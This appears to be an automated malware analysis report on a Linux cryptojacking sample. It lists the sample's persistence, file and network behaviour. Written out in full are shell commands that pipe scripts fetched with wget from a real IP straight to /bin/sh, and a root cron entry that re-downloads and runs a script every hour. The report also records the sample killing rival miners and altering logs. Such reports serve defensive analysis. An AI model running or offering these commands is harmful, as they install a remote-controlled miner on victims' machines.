Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /var/spool/cron/crontabs/root
Malicious functions:
Removes itself
Launches itself as a daemon
Launches processes:
- <SAMPLE_FULL_PATH> 2
- /bin/sh -c /usr/bin/wget -q -O - http://103.233.82.32/izxcv.sh | /bin/sh
- /usr/bin/wget -q -O - http://103.233.82.32/izxcv.sh
- /bin/sh
- /bin/sh -c mkdir -p /var/spool/cron/crontabs
- mkdir -p /var/spool/cron/crontabs
- /bin/sh -c uname -m
- uname -m
- /bin/sh -c echo \"0 * * * * /usr/bin/wget -q -O - http://103.233.82.32/i.sh | /bin/sh\" > /var/spool/cron/root
- /bin/sh -c echo \"0 * * * * /usr/bin/wget -q -O - http://103.233.82.32/i.sh | /bin/sh\" > /var/spool/cron/crontabs/root
- /bin/sh -c /usr/bin/wget -q -O - http://103.233.82.32/izxcvb.sh | /bin/sh
- /usr/bin/wget -q -O - http://103.233.82.32/izxcvb.sh
- mkdir /etc/seconfig
- rm /etc/seconfig/pools.txt
- rm /etc/seconfig/config.json
- grep -v grep
- grep redis-server\|hash\|xmr\|\.sr0\|Circle_MI\|get.bi-chi.com\|pool\|ddg\.\|mirai
- ps xf
- wget -q http://103.233.82.32/xorgg.i686 -O /etc/seconfig/xorgg
- wget -q http://103.233.82.32/ccc -O /etc/seconfig/cpu.txt
- wget -q http://103.233.82.32/cccc -O /etc/seconfig/config.txt
- wget -q http://103.233.82.32/con -O /etc/seconfig/config.json
- wget -q http://103.233.82.32/ppp -O /etc/seconfig/pools.txt
- ps auxf
- grep Circle_MI
- awk {print $2}
- xargs kill
- kill
- grep get.bi-chi.com
- grep hashvault.pro
- grep nanopool.org
- grep minexmr.com
- grep /boot/efi/
- grep /ddg.
- grep xorgg
- grep -q 8.8.8.8 /etc/resolv.conf
- rm -rf /var/tmp/*
- rm -rf /tmp/samba
- chmod +x /etc/seconfig/xorgg
- sleep 2
- /etc/seconfig/xorgg
Performs operations with the file system:
Modifies file access rights:
- /etc/seconfig/xorgg
Creates folders:
- /etc/seconfig
Creates or modifies files:
- /var/spool/cron/root
- /etc/seconfig/xorgg
- /etc/seconfig/cpu.txt
- /etc/seconfig/config.txt
- /etc/seconfig/config.json
- /etc/seconfig/pools.txt
- /etc/resolv.conf
- /var/log/wtmp
- /var/log/secure
- /root/.bash_history
Deletes files:
- /etc/seconfig/pools.txt
- /etc/seconfig/config.json
- /var/tmp/*
- /tmp/samba
Network activity:
Awaits incoming connections on ports:
- 127.0.0.1:47292
Establishes connection:
- 10#.##3.83.23:27
HTTP GET requests:
- 10#.###.82.32/izxcv.sh
- 10#.###.82.32/izxcvb.sh
- 10#.###.82.32/xorgg.i686
- 10#.##3.82.32/ccc
- 10#.##3.82.32/cccc
- 10#.##3.82.32/con
- 10#.##3.82.32/ppp
Sends data to the following servers:
- 10#.##3.83.23:27
Receives data from the following servers:
- 10#.##3.83.23:27
Other:
Collects CPU information
Collects RAM information
Collects information about network activity
